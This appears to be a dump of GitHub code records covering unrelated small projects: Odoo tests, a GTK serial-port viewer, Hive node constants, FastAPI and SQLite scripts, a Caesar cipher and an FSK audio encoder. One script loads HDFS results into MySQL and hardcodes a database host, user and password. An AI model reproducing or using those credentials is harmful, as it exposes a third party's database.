self.partner.id,\n        })\n        line_obj = self.env['purchase.order.line']\n        line = line_obj.new({\n            'order_id': self.purchase.id,\n            'product_id': self.product.id,\n            'price_unit': 100,\n            'quantity': 1,\n        })\n        line.onchange_product_id()\n        line_obj.create(line_obj._convert_to_write(line._cache))\n\n    def test_set_custom_date_planned(self):\n        now = fields.Datetime.now()\n        self.purchase.custom_date_planned = now + relativedelta(days=5)\n        self.purchase.button_confirm()\n        picking = self.purchase.picking_ids[0]\n        picking.action_confirm()\n        picking.action_assign()\n        for move in picking.move_lines:\n            move.quantity_done = move.product_uom_qty\n        picking.action_done()\n        self.assertEquals(len(self.purchase.picking_ids), 1)\n        self.assertEquals(len(self.purchase.picking_ids.move_lines), 1)\n        self.assertEquals(picking.scheduled_date, now + relativedelta(days=5))\n        self.assertEquals(\n            picking.move_lines[0].date_expected, now + relativedelta(days=5))\n\n    def test_standard_date(self):\n        self.purchase.custom_date_planned = False\n        self.purchase.button_confirm()\n        picking = self.purchase.picking_ids[0]\n        picking.action_confirm()\n        self.assertEquals(len(self.purchase.picking_ids), 1)\n        self.assertEquals(len(self.purchase.picking_ids.move_lines), 1)\n        self.assertFalse(self.purchase.custom_date_planned)\n        picking.action_assign()\n        for move in picking.move_lines:\n            move.quantity_done = move.product_uom_qty\n        picking.action_done()\n        self.assertTrue(picking.scheduled_date)\n        self.assertTrue(picking.move_lines[0].date_expected)\n","repo_name":"treytux/trey-addons","sub_path":"purchase_order_stock_picking_date_planned/tests/test_purchase_order_stock_picking_date_planned.py","file_name":"test_purchase_order_stock_picking_date_planned.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"40"} +{"seq_id":"43015417008","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nfrom gi.repository import Gtk, GObject\nimport gtk_helper\nimport serial_helper\nfrom 
base_window import BaseWindow\nfrom main import APP_NAME\n\n\nclass PortInfoWindow(BaseWindow):\n def __init__(self, parent_window):\n BaseWindow.__init__(self, __file__)\n self.__tree_view = self._builder.get_object(\"trPorts\")\n self._window.set_transient_for(parent_window)\n self._window.set_position(Gtk.WindowPosition.CENTER_ON_PARENT)\n\n self.__add_column(\"Port name\", 0)\n self.__add_column(\"Description\", 1)\n self.__add_column(\"VID:PID\", 2)\n\n self.port_list_store = None\n self.__fill_tree_view()\n\n def __fill_tree_view(self):\n ports = serial_helper.SerialHelper.get_available_ports()\n self.port_list_store = Gtk.ListStore(str, str, str)\n\n for port in ports:\n self.port_list_store.append([port[0], port[1], port[2]])\n\n self.__tree_view.set_model(self.port_list_store)\n\n def __add_column(self, title, column_id):\n column = Gtk.TreeViewColumn(title, Gtk.CellRendererText(), text=column_id)\n column.set_resizable(True)\n column.set_sort_column_id(column_id)\n self.__tree_view.append_column(column)\n\n def on_btnClose_clicked(self, widget):\n self.__on_close()\n\n def __on_close(self):\n self._window.destroy()\n\n def run(self):\n self._window.run()\n self.__on_close()","repo_name":"inflop/pyRsReader","sub_path":"ports_info_window.py","file_name":"ports_info_window.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"41731899649","text":"# -*- coding: utf-8 -*-\n\n###############################################################################\n# constant variables from v1\n###############################################################################\n\n# constants of db start\nDID_INFO_DB_NAME = \"hive_manage_info\"\n\n# for auth collection, must compatible with v1\n# this collection is treated as the temporary one for signin/auth, do not dependent on it for long usage.\nDID_INFO_REGISTER_COL = \"auth_register\"\nUSER_DID = \"userDid\" # added when /auth\nAPP_ID = \"appDid\" # added when /auth\nAPP_INSTANCE_DID = \"appInstanceDid\" # added when /signin\nDID_INFO_NONCE = \"nonce\"\nDID_INFO_TOKEN = \"token\"\nDID_INFO_NONCE_EXPIRED = \"nonce_expired\"\nDID_INFO_TOKEN_EXPIRED = \"token_expired\"\n# auth_register end\n\n# for vault collection, must compatible with v1\nVAULT_SERVICE_COL = \"vault_service\" # collection name\nVAULT_SERVICE_DID = \"did\" # user_did\nVAULT_SERVICE_MAX_STORAGE = \"max_storage\"\nVAULT_SERVICE_FILE_USE_STORAGE = \"file_use_storage\"\nVAULT_SERVICE_DB_USE_STORAGE = \"db_use_storage\"\nVAULT_SERVICE_MODIFY_TIME = \"modify_time\"\nVAULT_SERVICE_START_TIME = \"start_time\"\nVAULT_SERVICE_END_TIME = \"end_time\"\nVAULT_SERVICE_PRICING_USING = \"pricing_using\"\nVAULT_SERVICE_STATE = \"state\" # maybe not exists\n\nVAULT_SERVICE_STATE_RUNNING = \"running\" # read and write\nVAULT_SERVICE_STATE_FREEZE = \"freeze\" # read, but not write\nVAULT_SERVICE_STATE_REMOVED = \"removed\" # soft unsubscribe\n\nVAULT_SERVICE_LATEST_ACCESS_TIME = \"latest_access_time\" # for access checking on database, files, scripting.\n# constants of db end\n\n# for backup server collection\nVAULT_BACKUP_SERVICE_COL = \"vault_backup_service\" # collection name only for v1\nVAULT_BACKUP_SERVICE_USING = \"backup_using\" # pricing name\nVAULT_BACKUP_SERVICE_MAX_STORAGE = \"max_storage\"\nVAULT_BACKUP_SERVICE_USE_STORAGE = \"use_storage\"\nVAULT_BACKUP_SERVICE_START_TIME = \"start_time\"\nVAULT_BACKUP_SERVICE_END_TIME = \"end_time\"\n# end backup server collection\n\n# scripting 
begin, compatible with v1\nSCRIPTING_SCRIPT_COLLECTION = \"scripts\"\nSCRIPTING_SCRIPT_TEMP_TX_COLLECTION = \"scripts_temptx\"\n\nSCRIPTING_CONDITION_TYPE_QUERY_HAS_RESULTS = \"queryHasResults\"\nSCRIPTING_CONDITION_TYPE_AND = \"and\"\nSCRIPTING_CONDITION_TYPE_OR = \"or\"\n\nSCRIPTING_EXECUTABLE_TYPE_AGGREGATED = \"aggregated\"\nSCRIPTING_EXECUTABLE_TYPE_FIND = \"find\"\nSCRIPTING_EXECUTABLE_TYPE_COUNT = \"count\"\nSCRIPTING_EXECUTABLE_TYPE_INSERT = \"insert\"\nSCRIPTING_EXECUTABLE_TYPE_UPDATE = \"update\"\nSCRIPTING_EXECUTABLE_TYPE_DELETE = \"delete\"\n\nSCRIPTING_EXECUTABLE_TYPE_FILE_UPLOAD = \"fileUpload\"\nSCRIPTING_EXECUTABLE_TYPE_FILE_DOWNLOAD = \"fileDownload\"\nSCRIPTING_EXECUTABLE_TYPE_FILE_PROPERTIES = \"fileProperties\"\nSCRIPTING_EXECUTABLE_TYPE_FILE_HASH = \"fileHash\"\n\nSCRIPTING_EXECUTABLE_CALLER_DID = \"$caller_did\"\nSCRIPTING_EXECUTABLE_CALLER_APP_DID = \"$caller_app_did\"\nSCRIPTING_EXECUTABLE_PARAMS = \"$params\"\nSCRIPTING_EXECUTABLE_DOWNLOADABLE = \"_downloadable\"\n# scripting end\n\nSCRIPT_ANONYMOUS_FILE = '__anonymous_files__'\n\n# @deprecated compatible with v1\n# HIVE_MODE_DEV = \"dev\"\nHIVE_MODE_PROD = \"prod\" # for normal run\nHIVE_MODE_TEST = \"test\" # run on v1 test cases\n\n# for files service\nCHUNK_SIZE = 4096\n\n###############################################################################\n# constant variables added by v2\n###############################################################################\n\nURL_V1 = '/api/v1'\nURL_V2 = '/api/v2'\nURL_SIGN_IN = '/did/signin'\nURL_AUTH = '/did/auth'\nURL_BACKUP_AUTH = '/did/backup_auth'\nURL_SERVER_INTERNAL_BACKUP = '/vault-backup-service/backup'\nURL_SERVER_INTERNAL_RESTORE = '/vault-backup-service/restore'\nURL_SERVER_INTERNAL_STATE = '/vault-backup-service/state'\n\nBACKUP_FILE_SUFFIX = '.backup'\n\nDID = 'did'\nUSR_DID = 'user_did'\nAPP_DID = 'app_did'\nOWNER_ID = 'owner_id'\nCREATE_TIME = 'create_time'\nMODIFY_TIME = 'modify_time'\nSIZE = 'size'\nSTATE = 'state'\nSTATE_RUNNING = 'running'\nSTATE_FINISH = 'finish'\nSTATE_FAILED = 'failed'\nORIGINAL_SIZE = 'original_size'\nIS_UPGRADED = 'is_upgraded'\nCID = 'cid'\nCOUNT = 'count'\nVERSION = 'version'\n\n# for user did and app did relations\nCOL_APPLICATION = 'application'\nCOL_APPLICATION_USR_DID = USR_DID\nCOL_APPLICATION_APP_DID = APP_DID\nCOL_APPLICATION_DATABASE_NAME = 'database_name'\nCOL_APPLICATION_ACCESS_COUNT = 'access_count'\nCOL_APPLICATION_ACCESS_AMOUNT = 'access_amount' # data in and out from app data API\nCOL_APPLICATION_ACCESS_LAST_TIME = 'access_last_time'\nCOL_APPLICATION_STATE = STATE\n# extra: 'created' and 'modified'\nCOL_APPLICATION_STATE_NORMAL = 'normal'\n# COL_APPLICATION_STATE_REMOVED = 'removed'\n\n# for the order collection\nCOL_ORDERS = 'vault_order'\nCOL_ORDERS_SUBSCRIPTION = 'subscription'\nCOL_ORDERS_PRICING_NAME = 'pricing_name'\nCOL_ORDERS_ELA_AMOUNT = 'ela_amount'\nCOL_ORDERS_ELA_ADDRESS = 'ela_address'\nCOL_ORDERS_EXPIRE_TIME = 'expire_time'\nCOL_ORDERS_CONTRACT_ORDER_ID = 'contract_order_id'\nCOL_ORDERS_PROOF = 'proof'\nCOL_ORDERS_STATUS = 'status'\n\nCOL_ORDERS_STATUS_NORMAL = 'normal'\nCOL_ORDERS_STATUS_EXPIRED = 'expired' # not paid\nCOL_ORDERS_STATUS_PAID = 'paid'\nCOL_ORDERS_STATUS_ARCHIVE = 'archive'\n\n# for receipt, contains some fields of order collection\nCOL_RECEIPTS = 'vault_receipt'\nCOL_RECEIPTS_ORDER_ID = 'order_id'\nCOL_RECEIPTS_PAID_DID = 'paid_did'\n# order end\n\n# ipfs_files\nCOL_IPFS_FILES = 'ipfs_files'\nCOL_IPFS_FILES_PATH = 'path'\nCOL_IPFS_FILES_SHA256 = 'sha256'\nCOL_IPFS_FILES_IS_FILE = 
'is_file'\nCOL_IPFS_FILES_IPFS_CID = 'ipfs_cid'\nCOL_IPFS_FILES_IS_ENCRYPT = 'is_encrypt'\nCOL_IPFS_FILES_ENCRYPT_METHOD = 'encrypt_method'\n# end of ipfs_files\n\n# ipfs_cid_ref\nCOL_IPFS_CID_REF = 'ipfs_cid_ref'\n# end of ipfs_cid_ref\n\n# collection_metadata\nCOL_COLLECTION_METADATA = '__collection_metadata__'\nCOL_COLLECTION_METADATA_USR_DID = USR_DID\nCOL_COLLECTION_METADATA_APP_DID = APP_DID\nCOL_COLLECTION_METADATA_NAME = 'name'\nCOL_COLLECTION_METADATA_IS_ENCRYPT = 'is_encrypt'\nCOL_COLLECTION_METADATA_ENCRYPT_METHOD = 'encrypt_method'\n# end of collection_metadata\n\n# anonymous_files\nCOL_ANONYMOUS_FILES = '__anonymous_files__'\nCOL_ANONYMOUS_FILES_USR_DID = USR_DID\nCOL_ANONYMOUS_FILES_APP_DID = APP_DID\nCOL_ANONYMOUS_FILES_NAME = 'name'\nCOL_ANONYMOUS_FILES_CID = 'cid'\n# end of anonymous_files\n\nCOL_IPFS_BACKUP_CLIENT = 'ipfs_backup_client'\nCOL_IPFS_BACKUP_SERVER = 'ipfs_backup_server'\n\nBACKUP_TARGET_TYPE = 'type'\nBACKUP_TARGET_TYPE_HIVE_NODE = 'hive_node'\nBACKUP_TARGET_TYPE_GOOGLE_DRIVER = 'google_driver'\n\nBACKUP_REQUEST_ACTION = 'action'\nBACKUP_REQUEST_ACTION_BACKUP = 'backup'\nBACKUP_REQUEST_ACTION_RESTORE = 'restore'\n\nBACKUP_REQUEST_STATE = 'state'\nBACKUP_REQUEST_STATE_STOP = 'stop'\nBACKUP_REQUEST_STATE_PROCESS = 'process'\nBACKUP_REQUEST_STATE_SUCCESS = 'success'\nBACKUP_REQUEST_STATE_FAILED = 'failed'\nBACKUP_REQUEST_STATE_MSG = 'state_msg'\n\nBACKUP_REQUEST_TARGET_HOST = 'target_host'\nBACKUP_REQUEST_TARGET_DID = 'target_did'\nBACKUP_REQUEST_TARGET_TOKEN = 'target_token'\n\n# For backup subscription.\nBKSERVER_REQ_ACTION = 'req_action'\nBKSERVER_REQ_STATE = 'req_state'\nBKSERVER_REQ_STATE_MSG = 'req_state_msg'\nBKSERVER_REQ_CID = 'req_cid'\nBKSERVER_REQ_SHA256 = 'req_sha256'\nBKSERVER_REQ_SIZE = 'req_size'\nBKSERVER_REQ_PUBLIC_KEY = 'public_key'\n\n# @deprecated\nURL_BACKUP_SERVICE = '/api/v2/internal_backup/service'\nURL_BACKUP_FINISH = '/api/v2/internal_backup/finished_confirmation'\nURL_BACKUP_FILES = '/api/v2/internal_backup/files'\nURL_BACKUP_FILE = '/api/v2/internal_backup/file'\nURL_BACKUP_PATCH_HASH = '/api/v2/internal_backup/patch_hash'\nURL_BACKUP_PATCH_DELTA = '/api/v2/internal_backup/patch_delta'\nURL_BACKUP_PATCH_FILE = '/api/v2/internal_backup/patch_file'\nURL_RESTORE_FINISH = '/api/v2/internal_restore/finished_confirmation'\nURL_IPFS_BACKUP_PIN_CIDS = '/api/v2/ipfs-backup-internal/pin_cids'\nURL_IPFS_BACKUP_GET_DBFILES = '/api/v2/ipfs-backup-internal/get_dbfiles'\nURL_IPFS_BACKUP_STATE = '/api/v2/ipfs-backup-internal/state'\n\n\ndef get_unique_dict_item_from_list(dict_list: list) -> list:\n if not dict_list:\n return list()\n return list({frozenset(item.items()): item for item in dict_list}.values())\n","repo_name":"elastos/Elastos.Hive.Node","sub_path":"src/utils/consts.py","file_name":"consts.py","file_ext":"py","file_size_in_byte":8015,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"40"} +{"seq_id":"20816810643","text":"import collections\nfrom typing import List,Optional\nimport copy\nclass Solution:\n def diStringMatch(self, s: str) -> List[int]:\n s+=\"I\"\n l=0\n r=len(s)-1\n ans=[]\n for i in range(len(s)):\n if s[i]==\"D\":\n ans.append(r)\n r-=1\n else:\n ans.append(l)\n l+=1\n return ans","repo_name":"Reigo666/Leetcode","sub_path":"Reigo/leetcode/Python/942. 增减字符串匹配.py","file_name":"942. 
增减字符串匹配.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15599402471","text":"import pytest\n\nfrom changelog_gen.cli import util\n\n\n@pytest.mark.parametrize(\n (\"filename\", \"ext\"),\n [\n (\"CHANGELOG.md\", \"md\"),\n (\"CHANGELOG.rst\", \"rst\"),\n (\"CHANGELOG.txt\", None),\n ],\n)\ndef test_detect_extension(filename, ext, cwd):\n f = cwd / filename\n f.write_text(\"changelog\")\n\n assert util.detect_extension() == ext\n","repo_name":"EdgyEdgemond/changelog-gen","sub_path":"tests/cli/test_util.py","file_name":"test_util.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"18963524538","text":"import numpy as np \nimport pandas as pd \nimport matplotlib.pyplot as plt \n\n# Reading rows containing cities population\ndf = pd.read_excel(\n 'population.xls',\n header = 3,\n skipfooter = 3,\n index_col = 0,\n na_values = '-'\n)\n\n# Reading all cities population including INDONESIA row as an accumulation\ndf2 = pd.read_excel(\n 'population.xls',\n header = 3,\n skipfooter = 2,\n index_col = 0,\n na_values = '-'\n)\n\n# City where citizens is the most in 2010:\ndfMax2010 = df[df[2010] == df[2010].max()]\nnamaMax2010 = dfMax2010.index.values[0] \n\n# City where citizens is the least in 1971:\ndf = df.dropna(subset = [1971]) # dropping cities where value is NaN in 1971\ndfMin1971 = df[df[1971] == df[1971].min()] \nnamaMin1971 = dfMin1971.index.values[0] \n\n# Reading INDONESIA data\ndfindo = df2[df2[2010] == df2[2010].max()] \nnamaindo = dfindo.index.values[0] \n\n\n# Linear Regression\nfrom sklearn.linear_model import LinearRegression\nmodelMax2010 = LinearRegression()\nmodelMin1971 = LinearRegression()\nmodelindo = LinearRegression()\n\n# Training\n# ---- Jawa Barat ---- \nx = dfMax2010.columns.values.reshape(-1, 1)\ny = dfMax2010.values[0]\nmodelMax2010.fit(x, y)\n# ---- Bengkulu ----\nx = dfMin1971.columns.values.reshape(-1, 1)\ny = dfMin1971.values[0]\nmodelMin1971.fit(x, y)\n# ---- INDONESIA ----\nx = dfindo.columns.values.reshape(-1, 1)\ny = dfindo.values[0]\nmodelindo.fit(x, y)\n\n# Prediction of population by 2050\nmax2050 = int(round(modelMax2010.predict([[ 2050 ]])[0]))\nmin2050 = int(round(modelMin1971.predict([[ 2050 ]])[0]))\nindo2050 = int(round(modelindo.predict([[ 2050 ]])[0]))\nprint('Prediction of', namaMax2010, 'population in 2050:', max2050)\nprint('Prediction of', namaMin1971, 'population in 2050:', min2050)\nprint('Prediction of', namaindo, 'population in 2050:', indo2050)\n\n# Plotting\nplt.plot(\n dfMax2010.columns.values, dfMax2010.iloc[0], 'g-',\n)\nplt.plot(\n dfMin1971.columns.values, dfMin1971.iloc[0], 'm-',\n)\nplt.plot(\n dfindo.columns.values, dfindo.iloc[0], 'r-',\n)\n\nplt.scatter(\n dfMax2010.columns.values, dfMax2010.iloc[0], color = 'g', s = 80,\n) \nplt.scatter(\n dfMin1971.columns.values, dfMin1971.iloc[0], color = 'm', s = 80,\n)\nplt.scatter(\n dfindo.columns.values, dfindo.iloc[0], color = 'r', s = 80,\n)\n\n# Plotting Best Fit Line\nplt.plot(\n dfMax2010.columns.values,\n modelMax2010.coef_ * dfMax2010.columns.values + modelMax2010.intercept_,\n 'y-'\n)\nplt.plot(\n dfMin1971.columns.values,\n modelMin1971.coef_ * dfMin1971.columns.values + modelMin1971.intercept_,\n 'y-'\n)\nplt.plot(\n dfindo.columns.values,\n modelindo.coef_ * dfindo.columns.values + modelindo.intercept_,\n 'y-'\n)\n\nplt.legend([namaMax2010, namaMin1971, 
namaindo])\nplt.title('{} Population (1971-2010)'.format(namaindo))\nplt.xlabel('Year')\nplt.ylabel('Population (hundred million people)')\nplt.grid(True)\n\nplt.show()\n\n\n","repo_name":"albert-rian/IndonesiaPopulation_Forecasting_using_Linear_Regression_SKLearn","sub_path":"indonesian.py","file_name":"indonesian.py","file_ext":"py","file_size_in_byte":2879,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"43788221818","text":"from fastapi import FastAPI\nfrom pydantic import BaseModel\nfrom database import DBConnect\nfrom fastapi.encoders import jsonable_encoder\n\n\n\nclass ReadOrDelete(BaseModel):\n    name: str\n\nclass CreateOrUpdate(BaseModel):\n    name: str\n    birthday: str\n\napplication = app = FastAPI()\n\n\n\n@app.post(\"/create\")\nasync def feature(item: CreateOrUpdate):\n\n    request = jsonable_encoder(item)\n    name = request[\"name\"]\n    birthday = request[\"birthday\"]\n    dbconn = DBConnect()\n    response = dbconn.add_birthday(name, birthday)\n    return response\n\n\n@app.post(\"/read\")\nasync def feature(item: ReadOrDelete):\n\n    request = jsonable_encoder(item)\n    name = request[\"name\"]\n    dbconn = DBConnect()\n    response = dbconn.read_birthday(name)\n    return response\n\n\n@app.post(\"/update\")\nasync def feature(item: CreateOrUpdate):\n\n    request = jsonable_encoder(item)\n    name = request[\"name\"]\n    new_birthday = request[\"birthday\"]\n    dbconn = DBConnect()\n    response = dbconn.update_birthday(name, new_birthday)\n    return response\n\n@app.post(\"/delete\")\nasync def feature(item: ReadOrDelete):\n\n    request = jsonable_encoder(item)\n    name = request[\"name\"]\n    dbconn = DBConnect()\n    response = dbconn.delete_birthday(name)\n    return response","repo_name":"RobinSrimal/demo-day-1","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16595966613","text":"import pymysql\nimport json\nfrom datetime import datetime\nimport os\nimport pandas as pd\nfrom hdfs import InsecureClient\n\n\n# DB connection info\nclass db_conn:\n    host = 'j6a406.p.ssafy.io'\n    user = 'newsbig'\n    pwd = 'ssafy406!'\n    db = 'sinmunmul'\n    char = 'utf8'\n\nif __name__ == '__main__':\n    # with autocommit=True every statement is committed automatically, no explicit commit needed\n    conn = pymysql.connect(host=db_conn.host, user=db_conn.user, password=db_conn.pwd, db=db_conn.db, charset=db_conn.char, autocommit=True)\n    curs = conn.cursor(pymysql.cursors.DictCursor)\n    curtime = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n\n    code_num = [264,265,268,266,267,269,259,258,261,771,260,262,310,263,249,250,251,254,252,59,255,256,276,257,241,239,240,237,238,376,242,243,244,248,245,231,232,233,234,322,731,226,227,230,732,283,229,228]\n\n    sql = \"UPDATE news_topic SET del_yn=%s WHERE del_yn=%s\"\n    curs.execute(sql, ('y','n'))\n\n    for code in code_num:\n        path = 'topic/output/' + str(code) + \"/part-r-00000\"\n\n        # Connecting to Webhdfs by providing hdfs host ip and webhdfs port (9870 by default)\n        client_hdfs = InsecureClient('http://172.26.4.211:9870')\n        # connect again with an explicit user name\n        client_hdfs = InsecureClient('http://172.26.4.211:9870', user='j6a406')\n\n        encType = 'utf-8'\n        try:\n            with client_hdfs.read(path, encoding = encType) as reader:\n                data = pd.read_csv(reader, header=None, engine='python', encoding = 'utf-8', on_bad_lines='skip')\n                reader.close()\n        except pd.errors.EmptyDataError as e:\n            continue\n\n        list = []\n        map = {}\n        print(code)\n        for k in range(len(data)):\n            row = data.iloc[k][0].split(\"\\t\")\n            key = row[0]\n            times = row[1]\n            list.append([key, times])\n\n        list.sort(key = lambda x:x[1], reverse=True)\n\n        #print(list)\n        keyword = list[0][0]+\",\"+list[1][0]+\",\"+list[2][0]+\",\"+list[3][0]+\",\"+list[4][0]\n\n        sql = \"INSERT INTO news_topic (code, keyword, del_yn, reg_dt, reg_id, mod_dt, mod_id) values (%s, %s, %s, %s, %s, %s, %s)\"\n        try:\n            curs.execute(sql, (code, keyword, 'n', curtime, 'admin', curtime, 'admin'))\n        except pymysql.err.IntegrityError:\n            pass\n","repo_name":"minsang96/Sinmunmul","sub_path":"news_Recommend/topic_to_db.py","file_name":"topic_to_db.py","file_ext":"py","file_size_in_byte":2358,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"42161678194","text":"alphabet=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']\r\n#direction=input(\"Hey,Type 'encode' to encrypt\")\r\n#direction=input(\"decode' to decrypt\")\r\ntext=input(\"Enter your message\\n\").lower()\r\nshift=int(input(\"Enter the shift number\\n\"))\r\ndef encrypt(plain_text,shift_amount):\r\n    cipher_text=\"\"\r\n    for letter in plain_text:\r\n        position=alphabet.index(letter)\r\n        new_position=(position+shift_amount)%26  # wrap around so shifts past 'z' do not raise IndexError\r\n        new_letter=alphabet[new_position]\r\n        cipher_text+=new_letter\r\n    print(f\"The encoded text is {cipher_text}\")\r\ndef decrypt(plain_text,shift_amount):\r\n    cipher_text=\"\"\r\n    for letter in plain_text:\r\n        position=alphabet.index(letter)\r\n        new_position=(position-shift_amount)%26\r\n        new_letter=alphabet[new_position]\r\n        cipher_text+=new_letter\r\n    print(f\"The Decoded Text is {cipher_text}\")\r\nchoice=int(input(\"1->Encode\\n2->Decode\\n\"))\r\nif choice==1:\r\n    encrypt(text,shift)\r\nelse:\r\n    decrypt(text,shift)\r\n","repo_name":"Mahesh-Vardhan/Caesar_Cipher","sub_path":"caesar_cipher.py","file_name":"caesar_cipher.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"70104997882","text":"import numpy as np\nimport scipy.io.wavfile\nfrom aiofsk.modulation import MODULATORS\nfrom aiofsk.baud import DEFAULT_BAUD_OPTIONS\n\n\nasync def write_wav(wav_path: str, data: bytes, baud: int = 300, modulator: str = 'standard', amplitude=1.0):\n    modulator = MODULATORS[modulator](\n        DEFAULT_BAUD_OPTIONS.make_baud_nt(baud), amplitude\n    )\n\n    # frame_count = modulator.frame_size * 8  # prepend 8 bits of silence\n    frame_count = (modulator.frame_size * 8 * len(data))\n    wav_data = np.zeros((frame_count, 1))\n    i = 0\n    # for _ in range(modulator.frame_size * 8):\n    #     wav_data[i] = [0.0]\n    #     i += 1\n\n    for character in data:\n        for bit in modulator.iter_symbols(character):\n            modulated = modulator.modulate_bit(bit)\n            for sample in modulated:\n                wav_data[i] = sample\n                i += 1\n    scipy.io.wavfile.write(wav_path, modulator.sample_rate, wav_data)\n\n\nasync def read_wav(wav_path: str, baud: int = 300, modulator: str = 'standard'):\n    modulator = MODULATORS[modulator](\n        DEFAULT_BAUD_OPTIONS.make_baud_nt(baud)\n    )\n\n    rate, data = scipy.io.wavfile.read(wav_path)\n\n    frame_count = len(data) // modulator.frame_size\n    offset = 0\n    msg = b''\n    with modulator.get_demodulation_context() as demodulate:\n        current_byte = 0\n        for frame_cnt in range(frame_count):\n            frame = np.zeros((modulator.frame_size, 1))\n            for i in range(modulator.frame_size):\n                frame[i] = data[offset]\n                offset += 1\n            current_byte += demodulate(frame)\n            if frame_cnt > 0 and ((frame_cnt + 1) % 8 == 0):\n                msg += current_byte.to_bytes(1, byteorder='little')\n                current_byte = 0\n            else:\n                current_byte <<= 1\n    return msg\n","repo_name":"jackrobison/aiofsk","sub_path":"aiofsk/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6415190929","text":"import json\nimport urllib.request\n\nvocab_file = open(\"vocab4.txt\", \"r\", encoding=\"utf8\", errors=\"ignore\")\nvocab_content = vocab_file.readlines()\n\nkhmer_def_pair_arr = []\n\nfor line in vocab_content:\n    updated_line = line.replace('\\u200b', '')\n    khmer_def_pair = updated_line.rstrip().split('/')\n    khmer_def_pair_arr.append(khmer_def_pair)\n\nprint(khmer_def_pair_arr)\n\nfor word in khmer_def_pair_arr:\n\n    body_json_update = {\n        \"action\": \"updateNoteFields\",\n        \"version\": 6,\n        \"params\": {\n            \"note\": {\n                \"id\": word[0],\n                \"fields\": {\n                    \"English\": word[2]\n                }\n            }\n        }\n    }\n\n    response = json.load(urllib.request.urlopen(\n        'http://localhost:8765', json.dumps(body_json_update).encode('utf-8')))\n    print(response)","repo_name":"maxengel99/khmer-anki-automation","sub_path":"utility-scripts/update_def.py","file_name":"update_def.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41708055494","text":"\n# Assignment no:-02\n# Name:-Namrata Bhosale\n# Subject:-NLP\n# Roll no:-08 , Batch:-B1\n# Title:- TFIDF\nimport gensim\nimport pprint\nfrom gensim import corpora, models\nfrom gensim.utils import simple_preprocess\ndoc_list = [\n    \"Hello, how are you?\", \"How do you do?\",\n    \"Hey what are you doing? yes you What are you doing?\"\n]\ndoc_tokenized = [simple_preprocess(doc) for doc in doc_list]\ndictionary = corpora.Dictionary()\nBoW_corpus = [dictionary.doc2bow(doc, allow_update=True) for doc in doc_tokenized]\nfor doc in BoW_corpus:\n    print([[dictionary[id], freq] for id, freq in doc])\nimport numpy as np\ntfidf = models.TfidfModel(BoW_corpus, smartirs='ntc')\nfor doc in tfidf[BoW_corpus]:\n    print([[dictionary[id], np.around(freq, decimals=2)] for id, freq in doc])\n#OUTPUT\n# [['are', 1], ['hello', 1], ['how', 1], ['you', 1]]\n# [['how', 1], ['you', 1], ['do', 2]]\n# [['are', 2], ['you', 3], ['doing', 2], ['hey', 1], ['what', 2], ['yes', 1]]\n\n# [['are', 0.33], ['hello', 0.89], ['how', 0.33]]\n# [['how', 0.18], ['do', 0.98]]\n# [['are', 0.23], ['doing', 0.62], ['hey', 0.31], ['what', 0.62], ['yes', 0.31]]","repo_name":"namratabhosale20/NLP_Lab_Na","sub_path":"tfid.py","file_name":"tfid.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37474721795","text":"import sqlite3\n\n\ndef insert_to_db(teams, games, events, sports, athletes, results):\n    conn = sqlite3.connect('olympic_history.db')\n    cursor = conn.cursor()\n\n    # Inserting teams\n    for k, v in teams.items():\n        team_id = v['id']\n        name = v['name']\n        noc_name = v['noc_name']\n        cursor.execute(\"INSERT INTO TEAMS(ID, NAME, NOC_NAME) VALUES (?, ?, ?)\", (team_id, name, noc_name))\n    conn.commit()\n\n    # Inserting 
games\n for key, value in games.items():\n g_id = value['id']\n game_year = value['game_year']\n season = value['season']\n city = value['city']\n cursor.execute(\"INSERT INTO GAMES(ID, YEAR, SEASON, CITY) VALUES(?, ?, ?, ?)\", (g_id, game_year, season, city))\n conn.commit()\n\n # Inserting events\n for v in events.values():\n event_id = v['id']\n event_name = v['event_name']\n cursor.execute(\"INSERT INTO EVENTS(ID, NAME) VALUES (?, ?)\", (event_id, event_name))\n conn.commit()\n\n # Inserting sports\n for value in sports.values():\n sport_id = value['id']\n sport_name = value['name']\n cursor.execute(\"INSERT INTO SPORTS(ID, NAME) VALUES (?, ?)\", (sport_id, sport_name))\n conn.commit()\n\n # Inserting athletes\n for k, v in athletes.items():\n name = v['full_name']\n sex = v['sex']\n params = v['params']\n team_id = v['team_id']\n year_of_birth = v['year_of_birth']\n athlete_id = v['id']\n cursor.execute(\"INSERT INTO ATHLETES(ID, FULL_NAME, YEAR_OF_BIRTH, SEX, PARAMS, TEAM_ID) VALUES (?, ?, ?, ?, ?, ?)\",\n (athlete_id, name, year_of_birth, sex, str(params), team_id))\n conn.commit()\n\n # Inserting results\n for result in results:\n athlete_id = result['athlete_id']\n 